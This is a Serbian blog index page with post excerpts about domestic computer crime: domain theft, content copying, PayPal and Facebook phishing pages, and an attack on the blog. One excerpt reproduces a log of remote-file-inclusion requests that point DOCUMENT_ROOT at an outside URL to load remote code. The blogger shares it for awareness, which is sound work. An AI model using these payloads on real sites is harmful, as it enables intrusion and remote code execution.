И ми компјутерске криминалце имамо

Скраћена веза: https://pedja.supurovic.net/veza/3714

Није ретко да чујете како су наши људи експерти за рачунаре и да су међу првима у свету по знању и умењу. Као и у мнгим другим делатностима, тако и у рачунарском свету, зање и умеће се често тестира у криминалним радњама. Па да видимо чиме се то баве наши компјутерски генијалци наклоњени криминалу.

Крадљивац домена

У априлу 2008, М. Р. је преотео власништво над једним доменом и сајтом тако што је искористио безбедносни пропуст, упао на сајт, изменио податке тако да се представи као да је власник, и онда на основу тога од провајдера тражио и добио овлашћења да администрира домен, што је искористио да заиста и преузме власништво над доменом, отевши га од правог власника. […]
[ ... види цео чланак ... ]

Интернет – велика бесплатна самопослуга за новине

Скраћена веза: https://pedja.supurovic.net/veza/3673

Могу да замислим сцену: преламач добио чланак, сређује га али му треба илустрација, а нема је. Али, Гугл је чудо, отвориш га, укуцаш „uzice“, пређеш на страну за преглед пронађених фотографија, и ето на другом месту баш лепа панорама. Копиенпејстујеш у фотошоп, мало му га даш по кропу и готово, сређен чланак:

Баш се лепо уклопило у овом чланку на сајту Гласа Јавности (www.glas-javnosti.rs) зар не? Ма чудо је тај Интернет, на њему све има. Колико је лакши посао, не мораш да се цимаш по сопственој архиви или још горе да мољакаш за фотку ако немаш одговарајућу у архиви, само срч, и ето одмах велики избор, ко у самопослузи. […]
[ ... види цео чланак ... ]

Phishing поново јаше

Скраћена веза: https://pedja.supurovic.net/veza/3643

Пре два месеца писао сам о злоупотреби домена facebook.iz.rs за покушај крађе лозинки корисника Фејсбука. Данас је откривен још један такав покушај са доменом city-shop.iz.rs.

Овај домен је регистрован, на њега је постављен неки садржај који даје утисак да се ради о интернет продавници, мада се по садржају види да није активирана. Међутим у позадини, дубоко је закопана страна која симулира PayPal страну за пријаву, намењена за крађу лозинки корисника овог сервиса за плаћање.

Неопрезни интернет корисници, којима су злонамерници намеравали да подмећу ову страну уместо правог PayPal-а не би приметили разлику, уписали би своју лозинку и направили себи велики проблем. […]
[ ... види цео чланак ... ]

После мале паузе – опет ми украдоше чланак

Скраћена веза: https://pedja.supurovic.net/veza/3533

Недавно сам објавио чланак о геолокационим сервисима који омогућавају да сајтови знају где се налазите, а данас добих „тип“ од посетиоца да је исти чланак видео на форуму Врњачка бања (vrnjackabanjaforum.com) на адреси http://www.vrnjackabanjaforum.com/first/viewtopic.php?f=34&t=240

Проверим, кад оно стварно: ископиран је текст, нешто је чак дописано испод њега али ко не зна, не може да види да то није део оригинала, и чак је текст потписан. Илустрација која иде уз чланак није пренета, али то је вероватно зато што сам забранио линковање слика са непознатих сјатова (погледајте Hotlinking: кад вам други сајтови троше ресурсе), а копирача је вероватно мрзело да слику сними па поставља на форум копију. […]
[ ... види цео чланак ... ]

Хакерски напад на блог

Скраћена веза: https://pedja.supurovic.net/veza/3313

Данас сам у логу приметио покушаје напада на блог. Напади су сувише наивни и неуспели али ће можда некоме бити интересантно да види. Ево лога једно напада са адресе: 195.146.81.144 (host2.relline.ru)

/redirekcija-putanja-url-rewriti...avan-nacin/comment-page-1%20%20

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriti...avan-nacin///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin/comment-page-1///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

/redirekcija-putanja-url-rewriting-na-jednostavan-nacin?_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt????

///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

Зар се овај стварно надао да ће овако нешто да прође? Једно три-чеитири године раније би можда имао неку шансу да набаса на какав сајт који је толико бушан да овај напад успе.

Било би занимљиво имати неки додатак који би препознавао овакве покушаје па убијао конекције колико да се не троши проток безвезе.

 […]
[ ... види цео чланак ... ]

Домаћи случај phishing-а

Скраћена веза: https://pedja.supurovic.net/veza/3302

Не једном су ми замерали зашто инсистирам на јасним писаним правилима везаним за регистрацију бесплaтних .iz.rs домена и зашто сваки регистровани домен пролази ручну проверу. Оптуживан сам чак да све то радим зато да бих задовољавао неку своју сујету и давао себи на важности тако што ћу да одлучујем коме ћу да дозвољавам да региструје домен. Ствар је нажалост банална: када је нешто бесплатно велика је јагма, а нарочито од оних који су склони злоупоребама и криминалу.

Једна од ситуација због којих је проверавање домена неопходно се догодила данас. Данас је регистрован домен facebook.iz.rs (не морате отварати сајт пошто је он већ угашен). […]
[ ... види цео чланак ... ]